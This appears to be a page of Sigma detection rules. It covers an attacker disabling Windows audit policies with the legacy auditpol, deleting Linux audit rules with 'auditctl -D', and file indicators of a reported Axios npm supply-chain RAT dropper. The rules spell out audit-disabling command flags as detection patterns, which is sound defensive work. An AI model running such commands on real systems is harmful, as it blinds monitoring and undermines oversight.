- id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version
type: similar
status: test
description: |
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
- https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-18
modified: 2023-02-21
tags:
- attack.defense-impairment
- attack.t1685.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '/logon:none'
- '/system:none'
- '/sam:none'
- '/privilege:none'
- '/object:none'
- '/process:none'
- '/policy:none'
condition: selection
falsepositives:
- The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
level: high
Convert to SIEM query
high
Moderate
Medium FP
Audit Rules Deleted Via Auditctl
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
view Sigma YAML
title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
- https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
- https://linux.die.net/man/8/auditct
author: Mohamed LAKRI
date: 2025-10-17
tags:
- attack.defense-impairment
- attack.t1685.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/auditctl'
CommandLine|re: '-D'
condition: selection
falsepositives:
- An administrator troubleshooting. Investigate all attempts.
level: high
Convert to SIEM query
high
Moderate
Medium FP
Axios NPM Compromise File Creation Indicators - Linux
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
view Sigma YAML
title: Axios NPM Compromise File Creation Indicators - Linux
id: b7cb840c-11f6-47f7-b3ef-5524739c9077
status: experimental
description: |
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: file_event
product: linux
detection:
selection:
Image|endswith: '/curl'
TargetFilename: '/tmp/ld.py'
condition: selection
falsepositives:
- Highly unlikely
level: high
Convert to SIEM query
Showing 51-100 of 1,524